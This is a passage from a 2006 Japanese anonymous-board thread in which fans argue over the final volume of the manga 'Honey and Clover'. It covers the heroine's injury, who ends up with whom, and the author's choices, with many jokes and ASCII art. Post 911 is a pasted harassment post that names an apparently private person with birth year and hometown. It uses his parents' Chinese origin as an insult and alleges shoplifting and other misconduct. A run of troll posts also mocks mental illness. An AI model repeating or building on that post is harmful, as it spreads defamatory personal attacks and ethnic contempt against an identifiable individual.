埋め立て地や造成地などで、実際はそれほど繁殖力が強くない
植物だそうです。いってみれば高度成長、バブルの落とし子。
ついでにセイダカアワダチソウがないと押井的風景は成り立たない。

851 :花と名無しさん:2006/09/10(日) 12:39:43 ID:???0
やっぱ漫画は10巻がMAXだな。
ウミノは読者を解ってる作者だと思ったがその後短編見て
次の連載がどういうテイストなのか激しく気になる

852 :花と名無しさん:2006/09/10(日) 12:42:39 ID:???0
セイタカアワダチソウを見て知らん植物だなと思い
アメリカシロヒトリを見て虫が出てきてビビった。
みな物知りですね。

853 :花と名無しさん:2006/09/10(日) 12:44:14 ID:???O
はぐの怪我は普通ガラス落とした奴が責任負うんじゃないか?
触れられてないし

854 :花と名無しさん:2006/09/10(日) 12:47:28 ID:???0
たぶん修

855 :花と名無しさん:2006/09/10(日) 12:50:16 ID:???0
修だったのか━━━( ´∀`)・ω・) ゚Д゚)・∀・) ̄ー ̄)´_ゝ`)ノД`)・゚・。━━━!!!!!
手段を選ばないものすごい策士!(゚Д゚)

856 :花と名無しさん:2006/09/10(日) 12:51:48 ID:???0
最終回であんなに大怪我だったはずのはぐの怪我が
日常使用には問題ないぐらいまで治ってるのに驚いた
二人乗りの後ろに乗るってことは握力も戻ってるんだねえ
モンキーターンの波多野やこどちゃの羽山のような怪我を
想像してたので拍子抜けしたよ
あの怪我は修とくっつくための方便にすぎなかったんだなあ

857 :花と名無しさん:2006/09/10(日) 12:59:23 ID:???0
クローバーはハーブだからくえんだよ。ボケ。


858 :花と名無しさん:2006/09/10(日) 13:07:59 ID:???0
どんな効能が?

859 :花と名無しさん:2006/09/10(日) 13:10:18 ID:???0
幸運値1上昇

860 :花と名無しさん:2006/09/10(日) 13:23:54 ID:???0
ttp://portal.nifty.com/2006/09/10/a/img/zzhusen.jpg

861 :花と名無しさん:2006/09/10(日) 13:26:24 ID:???0
実ははぐが竹本にわたしたのも暗記パン。

862 :花と名無しさん:2006/09/10(日) 13:33:20 ID:???0
でもお腹をこわして結局忘れてしまう

863 :花と名無しさん:2006/09/10(日) 13:37:09 ID:???O
>>861
竹本くんへ
手が故障しました。
私は新幹線に乗せてあなたを外に追い出すことにしました。
あなたとは付き合えませんがいつでも私のことを見守ってください。
どうか元気でしあわせになって下さい。ひとりにしてごめんね。
でも他に彼女作っちゃだめですよ?
はぐ☆

864 :花と名無しさん:2006/09/10(日) 13:38:16 ID:???0
――オレはずっと考えていたんだ
うまく行かなかった作品に
意味はあるのかって
消えて行ってしまうものは
無かったものと同じなのかって…
今ならわかる
意味はある
あったんだよここに――
      /:.:.:.:.:.:.l   /  l    / ハ  ト、  ヽ  、 l   l |:.:.:.:.:.:.ヽ
     /_:_:_:i:.:.:.|   |  l  / /ム l  | ヽ__| ヽ ト|、   | |:.:.:.:.:.:.:.ハ
    /_:_:_:_:_ヽ:.|   |  /.r '|"´jノ   |  |  l | `l`.ト 、|  l |:.:.:.:.:.:/
       ̄ ̄|ハ|  |/!j/         l /  リ  ソ   |  l! /r‐ "
         | ヽ | / ィニ三ミ   jノ   三ミミt、  | /リ人
         从/ヽ|!   '' ~⌒         ⌒``゙   V´ ヽ
           { : ∧ ,:'://///:、  : : .:   ;.'/////ヽ !´: j ,}
          ヽ ヽ',ヽ./////ノ   `    、 /////ノ ,゙ ノ /
           丶、_゙,      __ __      /_ /
              ゙,      |      |      ,'
               ヽ      ',      ,'     ,.イ     がっぽり稼がせて
             /  ̄\    丶 ___ .ノ   / ̄ `ヽ、  頂きました^^
             ^ヽ ==‐> 、. _ .. イ、ー==  ノ
              `ー‐ ´___|        |--、ー "
                 /ゝ、.|        | ノ \_


865 :花と名無しさん:2006/09/10(日) 13:45:58 ID:???0
幸せな人が一人いた!

866 :花と名無しさん:2006/09/10(日) 13:58:29 ID:???0
どーでもいいが暗記パンって
トイレ行ったらもう忘れるんだよな?

867 :花と名無しさん:2006/09/10(日) 14:07:17 ID:???0
うん。
ちょっと上にも同じ話題出てるよ

868 :花と名無しさん:2006/09/10(日) 14:11:29 ID:???0
でもいい話だから許すよ

869 :花と名無しさん:2006/09/10(日) 14:26:12 ID:???0

       ∩___∩
    (ヽ  | ノ      ヽ  /)
   (((i ) /  (゚)   (゚) | ( i)))     
  /∠彡    ( _●_)  |_ゝ \
 ( ___、    |∪|    ,__ )
     |      ヽノ  /´
     |        /           
   三 |       /
     |   -―'' ̄ ̄ ヽ
      ゝ  __,,-―'、 \
三 __/  /        \ \_/|
/ __ _/          \_'丿
-->

870 :花と名無しさん:2006/09/10(日) 14:27:19 ID:???0
>>869
モンクぐらいむかつくな

871 :花と名無しさん:2006/09/10(日) 14:27:28 ID:???0
ドゴォォォ _  / ;
   ∧ ∧―= ̄ `ヽ,    必殺怒号拳。この拳は、トンファー使いに対するやられ役のみが会得できる拳である。
∵. ・(   〈__ >  ゛ 、_ この拳の特徴として、まずは防御方法が見て取られる。
       (/ , ´      トンファー使いから発せられるエネルギーは、尋常ではなく、人間なら触れるまでもなく消し飛ぶ。
      / / / \    しかし、怒号拳は、そのエネルギーを最小限に抑え、そしてリアクションに使うことが出来る。
     / /  ,'        そして、次の特徴として、効果音が挙げられる。この聞き慣れた「ドゴォォォ」という効果音、これは
   /  /|  |         やられ役が自ら出している物である。先程説明したとおり、トンファーのエネルギーをそのまま受けたら、
   !、_// 〉         音すらなく消し飛ばされるが、やられ役はそれを効果音によって抑えることが出来る。
       |_/       …この拳には攻撃技もある。それも、トンファーと並ぶほど強力な。だが、やられ役はあえてそれを使わない。
                  それは、ひとえにトンファー使いへの「長年の好敵手(とも)」という想いがあるからだろう。

                    民明書房『トンファーとヌンチャク、そしてやられ役の歴史』 より

872 :花と名無しさん:2006/09/10(日) 14:40:55 ID:???0
やっぱ編集部のテコ入れ要請かなんかで
5年後、10年後かの「同窓会」的な読みきり
やったりするんだろうけねぇ

873 :花と名無しさん:2006/09/10(日) 14:42:24 ID:???0
うんこしたら忘れるのがいい話なのか

874 :花と名無しさん:2006/09/10(日) 15:01:15 ID:???0
どんなに
あんきパンたべても
うんこしたらわすれるよ!
                     
                 ハ_ハ  
               ('(゚∀゚∩ わすれるよ!
                ヽ  〈 
                 ヽヽ_)


うみのさん、バーカバーカ


875 :花と名無しさん:2006/09/10(日) 15:11:30 ID:???0
今日も10巻買うの忘れたああああ

876 :花と名無しさん:2006/09/10(日) 15:17:11 ID:???0
>>863
ワロタw

877 :花と名無しさん:2006/09/10(日) 15:35:18 ID:???0
なんかぼろ糞にいわれてる
10巻は構成以外にはさして不満はないかな
最終巻にあんなにオマケ漫画入れるなと思ったけど
終わりについては、あんなもんだと思うけどね

しかし、カレカノもそうだし、これもそうだが私が好きな漫画って
最終巻で叩かれること多くて鬱
しかも、売れちゃったからだめになったとか
内容関係ない批判多いし

878 :花と名無しさん:2006/09/10(日) 15:38:47 ID:???O
確かにそうかも。

879 :花と名無しさん:2006/09/10(日) 15:39:27 ID:???0
>>874
わらたw

880 :花と名無しさん:2006/09/10(日) 15:42:54 ID:???0
ハチクロに関しては売れちゃったから…ってのもちょっとは関係あるんじゃないかと思う

881 :花と名無しさん:2006/09/10(日) 15:43:43 ID:???0
>>874
吹いたww

882 :花と名無しさん:2006/09/10(日) 16:21:51 ID:???0
874の自演が必死だな

883 :花と名無しさん:2006/09/10(日) 16:22:26 ID:???0
>>872
どっかの廃校の黒板に「10年後のなかまたち」を描いたりして。

884 :花と名無しさん:2006/09/10(日) 16:23:47 ID:???0
擁護させて
>>874
宿便となって腸壁にへばりついていたんですよーーーーーーーーーーーだ

885 :花と名無しさん:2006/09/10(日) 16:40:15 ID:???0
fksgh

886 :花と名無しさん:2006/09/10(日) 16:44:14 ID:???0
ノンノン、それじゃあ擁護になってないよ。

「宿便を落として美しく」「コロンクレンジング(浣腸)」のような
美容法があるけど、宿便なんてものは無いんだぞ。
大腸や肛門専門の御医者さんもそう言ってた。
うんこが全部出たあとの腸は綺麗なピンク色のひだひだ。
そうじゃないと腸検査や腸内撮影なんてできないでしょ。


ソースは↓の本ね。

よくわかる新版痔 平田雅彦先生著
http://www.amazon.co.jp/gp/product/4072470252/

痔のお医者さん 岩垂純一先生著(社会保険庁病院)
http://www.amazon.co.jp/gp/product/4832702645/


暗記パン=うんこになって全部忘れる。

887 :花と名無しさん:2006/09/10(日) 16:55:59 ID:???0
ドラえもんの秘密道具に突っ込むのも野暮だけど
パンの力で覚えてたからと言って、力が亡くなった後、完璧に忘れるってのは少しおかしいからな
ものごっつ思い出しにくくなるかもしれないけど、頭の片隅に位残ってるんだろうよ


888 :花と名無しさん:2006/09/10(日) 17:06:40 ID:???0
そういうことも含めて一般的に忘れたというのでは

889 :花と名無しさん:2006/09/10(日) 17:20:38 ID:???0
完璧に無くなるのでなければ、なんかの拍子に思い出すこともあるし
赤ん坊の頭では無理なくらい、鮮明な記憶として一時残ってたんなら
結構な年になっても、あれなんだったんだろ?ぐらいの感覚で覚えてるのも
別段、おかしくはないと思う

890 :花と名無しさん:2006/09/10(日) 17:22:45 ID:???0
うんちしたらおしまいなんだって

891 :花と名無しさん:2006/09/10(日) 17:29:29 ID:???O
なんか、竹本だけすっきりした終わり方じゃない?
山田や真山に関してはスルーじゃん。これがきっちり描かない良さなのか?
まぁ、竹本のラストってのはなかなか良いんだけど・・。

892 :花と名無しさん:2006/09/10(日) 17:33:01 ID:???0
ここまで金掛けたタイトルを10巻で
終わらせたんだからそれだけで秀作だろ!
ふつーに見ても秀作だとは思うけど。

893 :花と名無しさん:2006/09/10(日) 17:47:53 ID:???0
世間的には間違いなく名作。ラストもちゃんと名作っぽくできてる。

894 :花と名無しさん:2006/09/10(日) 17:56:04 ID:???O
>>877
現実を見ろよ
関係あるぞ

895 :花と名無しさん:2006/09/10(日) 17:58:40 ID:???O
>>893
名作っぽいって何ですか?

896 :花と名無しさん:2006/09/10(日) 17:58:56 ID:???0
人気がなかったらレスのなく叩きも少ないだろうな。
人気がある場合良い場合と悪い場合とでは天地だな。

897 :高橋佳子:2006/09/10(日) 18:29:22 ID:???O
私は二年前にドラマ脚本をやったプロです
ジャニーズとも友達です

898 :高橋佳子:2006/09/10(日) 18:31:14 ID:???O
大学時代はのアイドルでした

899 :高橋佳子:2006/09/10(日) 18:32:50 ID:???O
糞海野みたいにコネがないので有名になれません

900 :高橋佳子:2006/09/10(日) 18:34:28 ID:???O
また妄想を書いてしまいました
統合失調症なものですみません
ジャニーズが彼氏だと妄想して小説書いたこともあります

901 :花と名無しさん:2006/09/10(日) 18:36:13 ID:???0
ミルコ優勝かよ萎えたな

902 :花と名無しさん:2006/09/10(日) 18:37:28 ID:???0
最終巻ひでえ・・・
さんざん山田の失恋地獄を書き連ねたあげく
やっと!はぐサイドの話になったかと思えばオサーンとくっついて
森田の話はすこ〜しだけで、もう終わりか('A`)ナニコレ?

903 :高橋佳子:2006/09/10(日) 18:40:23 ID:???O
河村隆一さんは私のために曲を作ってくれました
中村うさぎさんと共著します
岩井志麻子さんは私をモデルに小説書いてくれました

904 :高橋佳子:2006/09/10(日) 18:41:38 ID:???O
私は34歳だけど女子高生に間違われます

905 :高橋佳子:2006/09/10(日) 18:43:00 ID:???O
河村隆一Love

906 :高橋佳子:2006/09/10(日) 18:44:54 ID:???O
海野は糞

907 :花と名無しさん:2006/09/10(日) 18:56:47 ID:???O
スルーするべきだがあえて言う。
カエレ(・∀・)!

908 :花と名無しさん:2006/09/10(日) 19:17:10 ID:???0
竹本母「おまえが好きな はぐちゃん いつお嫁に来てくれるんだい?」

909 :花と名無しさん:2006/09/10(日) 19:25:07 ID:???0
>>901
ここ読んだら動画探そうと思ってたのに
まさかハチクロスレでネタバレされるとは・・・orz


910 :花と名無しさん:2006/09/10(日) 19:48:33 ID:???0
>>909
悪いがワロタw
ハチクロスレだもんなぁ

911 :花と名無しさん:2006/09/10(日) 19:55:03 ID:tZyrhMSz0
677 :この頃流行の名無しの子:2006/09/01(金) 02:17:37 ID:hUOnACBX0
        ________   
       /:.'`::::\/:::::\   
      /::            \
     /::.  /"""  """\ ヽ
     |::〉   ●"    ●" |  
   (⌒ヽ             |)
    ( __     ( ∩∩ )    |
      |  、_____  /   
      ヽ   \____/  /
       \        /
         \____/

         竹石 圭佑
      (1986〜 愛知県名古屋市)

在日中国人の両親を持つ為か、日本語のアクセントがおかしい時が多々ある。
小学生の時に万引きで補導されたらしく、その頃から既に歪んだ性格であった考えられる。

中学・高校時代…意中の女子には露骨にちょっかいを出して気を引こうとし、また、その時の言動は挙動不審で相手に好意があることがミエミエな為、非常に痛々しい。
でしゃばりで、なぜか偉そうな態度をとっていたが、不良学生相手にはビクビクしながら機嫌をとっていたという不可解な面も併せ持つ。
また特に自分より力の弱い女性教員や女子生徒等を格好の的としていたので、その様な人間には異常に高圧的な態度をとり、馬鹿にし、いつも幼稚な悪口や悪質な嫌がらせを考えて楽しんでいた。

相当な目立ちたがり屋で「地球は自分を中心に回ってる」という性格。しかし、何の能力・才能の欠片もなく、ヘラヘラしていただけなので精神が不安定だったとも考えられる。あだ名はダメ石(何をやってもダメなくせに口八丁なので)→デメ石(非常に出目金に似た顔なので)。

愛知県の底辺の大学に通ってるが、名古屋大学医学部を目指しているらしく、医学生になった自分を日々妄想している。
余談だが、KAT-TUNの田中聖をライバル視しているらしい。

※注 これは自分の知っている範囲の竹石圭佑の情報であり、全てではないと思われ。


912 :花と名無しさん:2006/09/10(日) 19:57:33 ID:???0
>>908
母さん、はぐちゃんはもう・・・・・

913 :渚 水帆(作家&元阪大アイドル):2006/09/10(日) 20:00:13 ID:karpVpOO0
4176.デザート画像♪ 返信 引用

名前:渚 水帆 日付:9月10日(日) 19時36分
先日、大阪文学学校の仲間のMさんと食べた
奇麗に盛り付けされたケーキの画層を新しくUPしました♪

↓画像掲示板ぜひ見てみてね♪
http://hp.jpdo.com/cgi21/236/joyful.cgi?

はちみつとクローバー、映画観に行き、今2巻を読んでいます♪
本屋の店先には最新刊の10巻がずらり☆
これから続き読みのが楽しみですね♪

914 :花と名無しさん:2006/09/10(日) 20:02:10 ID:???O
>>883
高校の時のクラスの黒板にマッキーのどんな〇きもの歌詞が書いてあったのを思い出しました。
まぁ自分は才能の無いはぐみたいな存在でしたが・・・

915 :花と名無しさん:2006/09/10(日) 20:04:12 ID:???0
>>914
才能の無いはぐって単なるウンパルンパか?消えろ

916 :花と名無しさん:2006/09/10(日) 20:13:01 ID:???O
>>902
真山の為の漫画だもん

917 :花と名無しさん:2006/09/10(日) 20:18:08 ID:???0
竹本嫌いになった
つうか作者壊れたか?

918 :花と名無しさん:2006/09/10(日) 20:28:02 ID:???0
竹本好きな俺は満足、最後まで青春だったなぁ(*´Д`)

関係ないがクローバーのハチミツ
ttp://www.miel-honey.com/SC/SC_honey/SC_honey_clover.htm

919 :花と名無しさん:2006/09/10(日) 20:29:37 ID:???0
竹本は、キャラの中では割かしよく描かれてたほうだと思う

920 :花と名無しさん:2006/09/10(日) 20:32:28 ID:???0
早く終わりにしたかったのかね

921 :花と名無しさん:2006/09/10(日) 20:34:08 ID:???O
9巻の表紙って森田だとずっと思ってたけど野宮さんだったのね…

922 :花と名無しさん:2006/09/10(日) 20:36:44 ID:???0
森田にかんしては不完全延焼気味のような気がする。
その後をきっちり描いて欲しいというのはわがままか
竹本のほうは案外、六太郎あたりと幸せになるような気がするから
別にいいけど。

923 :花と名無しさん:2006/09/10(日) 20:37:11 ID:???0
竹本9巻までは良かったのに10巻で壊れた

924 :花と名無しさん:2006/09/10(日) 20:38:02 ID:???O
修がはぐには家族愛って何で?
女なんだから恋愛や性欲の対象だろ
いくら娘のような、だって女は女だし

925 :花と名無しさん:2006/09/10(日) 20:49:58 ID:???0
でも続編やるんだろ?

926 :花と名無しさん:2006/09/10(日) 20:50:43 ID:???0
竹本があまりに蚊帳の外だということに
最後にようやく気付いた作者の暴走

927 :花と名無しさん:2006/09/10(日) 21:02:24 ID:???0
リカは最後に自殺ってこのスレで前言って無かったっけ?
自殺してないよな?嘘?

928 :花と名無しさん:2006/09/10(日) 21:02:27 ID:???0
10巻読んだ。もやっとする終わり方だと思った

929 :花と名無しさん:2006/09/10(日) 21:11:36 ID:???0
>>927
お前…あのシーン見落としてるよ

930 :花と名無しさん:2006/09/10(日) 21:11:37 ID:???0
大騒ぎした割にはぐの怪我回復早すぎ。
怪我がひどいからこその超展開だろうに。
ウミノさん、もう少し気を使って欲しいよ。

931 :花と名無しさん:2006/09/10(日) 21:14:00 ID:???0
やだなぁ、あれは竹本の幻影ですよ(サンドイッチも自分で作った)

932 :花と名無しさん:2006/09/10(日) 21:17:11 ID:???0
ミドリちゃんは最後まで忘れされるのかと思ったけど、
10巻でも出てきてよかった。リーダーよりやっぱこっち。

933 :花と名無しさん:2006/09/10(日) 21:23:25 ID:???0
空の小鳥ってリカさんの話じゃないのか

934 :花と名無しさん:2006/09/10(日) 21:24:26 ID:???0
怪我した辺りから展開ありがちだなって思った

935 :花と名無しさん:2006/09/10(日) 21:24:33 ID:???0
今日10巻買ってきた。評判悪いから恐る恐る読んだけどきちんとまとまってたと思うよ。

竹本ははぐを好きになったことで成長できたし、
森田もはぐのおかげで大事なものを手放さずにすんだと思う。

真山とリカさんは9巻で決着ついてたし、
あゆと野宮さんも、アレでいいと思う。
真山のことを簡単に忘れられないっていうのもあゆの性格と片思いの時間の長さからいって理解できるし、
そんなあゆのことを見守っていきたいっていう野宮も成長してる。

6〜7巻あたりの将来に対する不安も、修ちゃんを選ぶっていう伏線だったんだろうなぁと思う。

長文スマソ

936 :花と名無しさん:2006/09/10(日) 21:32:49 ID:XCj0R+BS0
>>935
どこを読めば真山と理花さんは決着付いたっていえるのかと小一時間

937 :花と名無しさん:2006/09/10(日) 21:34:42 ID:???0
>>936
ついてるでしょう。決着。どうして決着ついてないっていえるの?

938 :花と名無しさん:2006/09/10(日) 21:34:51 ID:???0
プードル飼ってるからミドリちゃん見るとムカつく

939 :花と名無しさん:2006/09/10(日) 21:36:25 ID:???0
>>935
修の恋愛感情はいきなりすぎない?

940 :花と名無しさん:2006/09/10(日) 21:37:55 ID:???O
リカは修のとこに行こうとしてたな
大事な大事な人って感じだな(恋愛じゃなく)
まだまだ
修>>真山な気がするが
真山に引き留められて 止めた所を見ると....着々と真山との仲は進行してるな

941 :花と名無しさん:2006/09/10(日) 21:38:27 ID:???0
>937
極少数だけど、フラグイベントが発生してフラグが立たないと理解できない人が居る。
ゲームのやりすぎか何かなんだと思うけど。

942 :花と名無しさん:2006/09/10(日) 21:40:16 ID:???O
リカは自殺してない
ここでそんな話が出たのかは知らんがたぶん釣り

943 :942:2006/09/10(日) 21:43:32 ID:???O
ああごめん>>927

944 :花と名無しさん:2006/09/10(日) 21:45:23 ID:???0
>>936

原田のポジションに真山を置くことはできないでしょうが、
リカの内側と外側でいうなら、真山は内側に入れてもらえた人間だと思うのです。

原田が死んで、リカと修の心をもっていったけれど、
修をつなぎとめたのははぐで、
リカをつなぎとめたのは、真山のストーカー愛でしょう。

リカが原田を忘れて、真山のことを好きになるというのは、あまりにもリカの本質から離れるように思います。
あのふたりの幸せの形は、「真山の気持ちをリカが受け止める」ことだと思うので、私は決着がついていると解しました。

解釈に誤りがあれば、申し訳ありません。

945 :花と名無しさん:2006/09/10(日) 21:46:38 ID:???0
>>942
空気嫁

946 :花と名無しさん :2006/09/10(日) 21:48:15 ID:jLhgwITm0
はぐは最初から好きではないが
作品自体は自分は好きだったよ
唐突な事故もはぐが森田、竹本を選ばないのも受け入れられた
むしろ誰ともくっつかないのはありだと思ってた

修はぐさえなければね・・・




947 :935:2006/09/10(日) 21:51:25 ID:???0
>>939

丹下先生の言葉の中に真理があるんだと思います。

父性愛が、自分に輝きを取り戻させてくれた愛しいものへの愛情にかわりうることは往々にしてありうると思います。
その境目がいつかを推理する楽しみは残されていると思います。

私は、はぐが自立しようとしていたときの修が感じていたさみしさやもどかしさの中に、
「お父さん」とは違うものを感じていました。

948 :花と名無しさん:2006/09/10(日) 21:53:29 ID:???0
オラァ田舎者だからわからねえが、はぐは幸せ者だっぺ?

949 :花と名無しさん:2006/09/10(日) 21:57:17 ID:???0
>>944
ご丁寧にどうもです
944さんの言うこともわかりますが
自分はもっと形で、というか目に見える決着を期待してました
そういう点ではちょっと物足りない気がしました


950 :花と名無しさん:2006/09/10(日) 21:59:25 ID:???0
恋愛と自立は別もの・・・だ・・よね・・・・

951 :花と名無しさん:2006/09/10(日) 22:06:18 ID:???0
野宮「例えばさ、これが『真山が君を好きになるスイッチ』だとする
    でも、これを押したら代わりに『山崎が一生暗いところに閉じ込められて
    誰にも会えなくなる』としたらどうする?押すの?

山田「押します。」

952 :花と名無しさん:2006/09/10(日) 22:11:21 ID:???0
スプリット

953 :花と名無しさん :2006/09/10(日) 22:12:45 ID:jLhgwITm0
>>950
自分もそう思う
森田との恋愛より夢を選んで、はぐが修の下をはなれてこれからは
自分の足で歩いていくという結末なら大歓迎だったよ・・・
結局はぐって成長してないような

954 :花と名無しさん:2006/09/10(日) 22:14:10 ID:???0
もやっとする人は、7巻辺りからでいいから連続で読み返すといいかも。
つーか、9巻後半〜10巻は完全にエピローグと思って読んだ方がいい。

つっても先生の描写足らないなーと思うのは自分もだけどなwww


955 :花と名無しさん:2006/09/10(日) 22:15:40 ID:???0
>>947
「お父さん」とはちがうものとは恋愛感情を…ってこと?
はぐは修にとって自分では見れなかった世界を見せてくれる
夢を見せてくれる大切な宝ものだと思ってたよ。
原田を失ったことで動けなくなってた修がはぐのサポートをすることで
また夢に前向きになっていくのに恋愛は関係なくても良かったんじゃないかな?


956 :花と名無しさん:2006/09/10(日) 22:18:49 ID:???O
>>924
変態乙

957 :花と名無しさん:2006/09/10(日) 22:19:29 ID:???0
>>952
ED曲ってタイトルからしてラストのネタバレだったのね。

958 :花と名無しさん:2006/09/10(日) 22:20:08 ID:???O
>>924
男は女なら必ず勃つ!やりたくなる!っつう平和な人ですね

959 :花と名無しさん:2006/09/10(日) 22:20:53 ID:???0
修に「はぐぅ〜はぐぅ〜」て言わせ過ぎてたのが良くなかった
あとでどんなシリアス展開になろうがキモいだけ

960 :花と名無しさん:2006/09/10(日) 22:21:44 ID:???O
>>935
脳内補完乙

961 :花と名無しさん:2006/09/10(日) 22:22:46 ID:???0
>>957
そう考えたら「ふがいないや」も少し関わるような気がする。
>>959
しかも番外編は二つともその頃のだしな。

962 :花と名無しさん:2006/09/10(日) 22:23:51 ID:???O
>>947
臭萌え乙

963 :花と名無しさん:2006/09/10(日) 22:24:29 ID:???0
結局相思相愛ラブラブカップルは一組も成立しなかったわけだな
そう考えてみると案外森田とリカが一番お似合いだったのではないか
リカは天才型の男が好きだし、森田は原田の影なんかものともしないだろうし
でもこの二人面識無いんだよな…

964 :花と名無しさん:2006/09/10(日) 22:32:02 ID:???0
そこでスピンオフ

965 :花と名無しさん:2006/09/10(日) 22:33:17 ID:???0
山田もさぁ、もう真山真山もいい加減にしたら?
原田のように死んじゃったわけじゃなし、お互いのために良くないよ
って思う自分は、もっと早い巻でやめとけばよかったのかも。
曖昧エンドは嫌じゃないけど、ここまで引きずられるとしつこすぎて。

966 :花と名無しさん:2006/09/10(日) 22:34:43 ID:???0
>>964
それは完全な続編になりうるのかなぁ?

967 :花と名無しさん:2006/09/10(日) 22:36:13 ID:???0
>>965
UFOキャッチャーで、5000円つぎこんだから
取れるまであきらめられないっていう状態

968 :花と名無しさん:2006/09/10(日) 22:39:52 ID:???0
じゃあここでM&A

969 :花と名無しさん:2006/09/10(日) 22:42:50 ID:???0
正直最後一番幸せそうなのは山田達ではないだろうか。
あそこから仲が上昇し易そう。

970 :927(=942):2006/09/10(日) 22:46:01 ID:???0
>>945
自演でカマかけてスマン
なんだよ…やっぱり嘘だったのか…まぁ良いけど

971 :花と名無しさん:2006/09/10(日) 22:46:50 ID:???0
森田に邪魔されなければ修も幸せだろうw

972 :花と名無しさん:2006/09/10(日) 23:10:11 ID:???0
10巻って初回は無いの?

973 :花と名無しさん:2006/09/10(日) 23:24:42 ID:???0
アニメでははぐが「一緒に箱を開ける云々」ってくだりがあったけど、
コミックでは無いの?

974 :花と名無しさん:2006/09/10(日) 23:33:11 ID:dmM8HUCP0
あるズェ?ウフフ…

975 :花と名無しさん:2006/09/10(日) 23:37:13 ID:dmM8HUCP0
でも口に出してはだめだズェ?ウフフ…
ずっと一緒に戦ってくださいとはウフフ…
彼には彼の人生があるズェ?ウフフフ…

976 :花と名無しさん:2006/09/10(日) 23:50:25 ID:dSMLl0VxO
真山さんと同じムーンリバーの曲が欲しいんですが、
なんて言うアーティストさんでしょうか?
曲名だけだと、いっぱいでてきてしまいます

977 :花と名無しさん:2006/09/10(日) 23:55:15 ID:???0
>>967
天使人形でも狙っているのか?

978 :花と名無しさん:2006/09/11(月) 00:12:20 ID:???0
鍵の臭いがすr

979 :花と名無しさん:2006/09/11(月) 00:15:17 ID:O6LyCWGb0
>>976
そんなのヘップバーンに決まってるズェ・・・ウフフ
リカは純朴だからカヴァー曲とかハジけたものであるはずがないズェ・・・
映画そのままのメロディーに決まってるズエウフフ・・・
ちなみに作曲はピンクパンサーのテーマで知られるヘンリーマンシーニ・・・
刑事コロンボのテーマも彼だズェ・・・ウフフフフフウフフ・・・アハハハハハハ

980 :花と名無しさん:2006/09/11(月) 00:16:58 ID:???0
>>976
あえてフランクシナトラを薦めておこうウフフ・・・

981 :花と名無しさん:2006/09/11(月) 00:22:19 ID:???O
ありがとう。
たぁ〜らぁ…たぁ〜らぁ…って感じの曲ですか?
早速携帯でとったんですが自信がなくて

982 :花と名無しさん:2006/09/11(月) 00:25:58 ID:???0
>>981
フー…ンフンフン フーフ フフフー
って感じ

983 :花と名無しさん:2006/09/11(月) 00:26:00 ID:???0
>>981
ttp://www.youtube.com/watch?v=XLLNV1UVzz0
ウフフ・・・

984 :花と名無しさん:2006/09/11(月) 00:49:00 ID:???0
>>982
高音、低音パートに分けたほうがよくないか?

985 :花と名無しさん :2006/09/11(月) 00:49:45 ID:???0
竹本エンド=少女漫画の王道(主人公とくっつく)
森田エンド=流れに無理がない
誰ともくっつかないエンド=想像できうる限りの最悪な結末

実際
修エンド

『ウミノの場合に限って常に最悪のケースを想定しろ。奴は必ずその少し斜め上を行く!』

986 :花と名無しさん:2006/09/11(月) 00:56:00 ID:???O
誰ともくっつかないEDが良かった

987 :花と名無しさん:2006/09/11(月) 01:24:45 ID:???0
このスレ的に誰ともくっつかない自立エンドキボンが
どの層にもいいかなって感じだったわけだが

988 :花と名無しさん:2006/09/11(月) 01:31:08 ID:???0
>>951
わろたwww

989 :花と名無しさん:2006/09/11(月) 01:32:33 ID:???0
せっかく自立しようと頑張ってた女の子が
怪我して自立できなくなったってもの凄い鬱話だよな

990 :花と名無しさん:2006/09/11(月) 01:33:11 ID:???0
次スレは?

991 :花と名無しさん:2006/09/11(月) 01:37:37 ID:???0
――自立エンド後――

羽海野チカ『ハチミツとクローバー』は読者に媚びる糞漫画
1 :花と名無しさん
  さんざん引っ張っておいて誰ともくっつかないエンドは読者に対して
  あまりにも不誠実だと思います><
  この商業漫画について語りませう

  ◆ コミックス第10巻…9月8日発売 ◆
  ◆ アニメ第2部…放送中 ◆
  ◆ 映画…一部上映中 ◆
  ※アニメ、映画の話題はそれぞれ専用のスレがあるのでそちらでどうぞ(>>2-3参照)※
  ★ このスレはsage進行です ※メール欄に半角で「 sage 」と記入。これ重要※
  ★ 荒らし・煽りは完全無視 ※反応するアナタも同罪です。これ常識※
  ★ 風紀もほどほどに ※話題の流れを変えたかったら自分から別の話題を投下する。これ鉄則※

2 :花と名無しさん
  ウミノ先生はストーリーを考えるのがめんどくさくなったんだよ。
  まあ、真面目にやってもどうせ糞な話だったろうけどなwww

992 :花と名無しさん:2006/09/11(月) 01:39:27 ID:Bkqq1o5l0
怪我ねぇ…確かに真山田サイドが収束しつつある一方
はぐサイドは怪我が無かったら10年かかっても進展あるかどうか…

ダラダラ続くよりはよかったんでは?

993 :花と名無しさん:2006/09/11(月) 01:42:44 ID:???O
媚びないからこその自立エンド
まあ修はぐでなければ何でもいいんだけどな

994 :花と名無しさん :2006/09/11(月) 01:50:14 ID:???0
アマゾネスのレビューってなんでマンセー意見ばっかなの?


995 :花と名無しさん:2006/09/11(月) 01:52:57 ID:???0
アマゾンのレビュあーなんて民度低すぎだから

996 :花と名無しさん:2006/09/11(月) 01:53:58 ID:e0xcMpJPO
はぐと森田は好きだけどやっぱ感情移入はできなかった。
平凡な人間としてかかれてた竹本が成長する様子はよかった。
やりたいこと決まって良かったと思う。

997 :花と名無しさん:2006/09/11(月) 02:31:51 ID:???0
青春失恋話に恋愛完結期待しちゃあかん、っていい例になったな

998 :花と名無しさん:2006/09/11(月) 03:28:31 ID:O6LyCWGb0
1000はすぐそこですよ・・・ウフフ

999 :花と名無しさん:2006/09/11(月) 03:29:19 ID:O6LyCWGb0
深夜に1000取っちゃっていいですかウフフ・・・

1000 :花と名無しさん:2006/09/11(月) 03:30:02 ID:O6LyCWGb0
初めての1000ゲ〜ッツ!!!!!!!!!!ウフフ

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

222 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)